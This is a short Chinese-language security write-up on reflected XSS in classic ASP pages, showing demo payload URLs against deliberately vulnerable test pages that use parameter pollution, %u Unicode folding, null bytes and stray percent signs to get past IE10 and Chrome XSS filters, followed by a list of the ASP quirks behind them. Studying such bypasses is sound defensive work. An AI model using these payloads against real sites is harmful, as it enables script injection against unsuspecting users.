<!DOCTYPE html > <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=111</div> </body> </html>
<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=111, 222</div> </body> </html>
这种情况下,构造一个XSS
http://www.sdl.me/xssdemo/getxss.asp?input1=%3Cscript/&&input1=FOOBAR&input1=%3Ealert(‘@IRSDL’);%3C/script%3E
<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=<script/, >alert('@IRSDL');</script></div> </body> </html>
经过测试,绕过了IE 10的XSS检测,而没有绕过Chrome的
--------------------------- www.sdl.me/xssdemo/getxss.asp?input1=<script/&in%u2119ut1=>al%u0117rt(‘@IRSDL’)</script/
<!DOCTYPE html> <html> <body> <h1>This page is vulnerable to XSS!</h1> <pre> Inputs: - Get: ?input1=something </pre> <div>Input1=<script/, >alert('@IRSDL')</script/</div> </body> </html>
绕过了Chrome,IE10. 通绕XSS1 XSS2的方案:
http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=’)1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26<1&input2=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/
http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=’)1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26%3C1&input2=0%3Cale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/
原理: 1,ASP特性,HTTP参数污染[HTTP Parameter Pollution (HPP)]:ASP允许对同一参数传递多次值。如上例中。 2,UTF-8字符会被转ASCII字符,在参数名和值中都有效。比如,[inPut1=<scriPt/>] 等价于 [%u0131n%u2119ut1=%u3008scr%u0131%u2119t>] 3,ASP中参数名不区分大小写,如,input1等价于InPuT1 4,不管在参数名或值中,NULL后的值都被忽略。[input1=test] 等价于 [input1%00Something=test%00Anything] 5,在参数名或值中,%后如果不是有效的十六进制,%会被忽略。 比如:[input1=test] 等价于 [%input1%=t%%est%] 6,在&后的参数名后如果不接=,ASP不会将其作为一独立参数。如,[?&input1=test] 参数名为&input1 值为test,[?&input1&input1=test]参数名为&input1&input1.
查看更多关于ASP XSS时用到的些特性 - 网站安全 - 自学php的详细内容...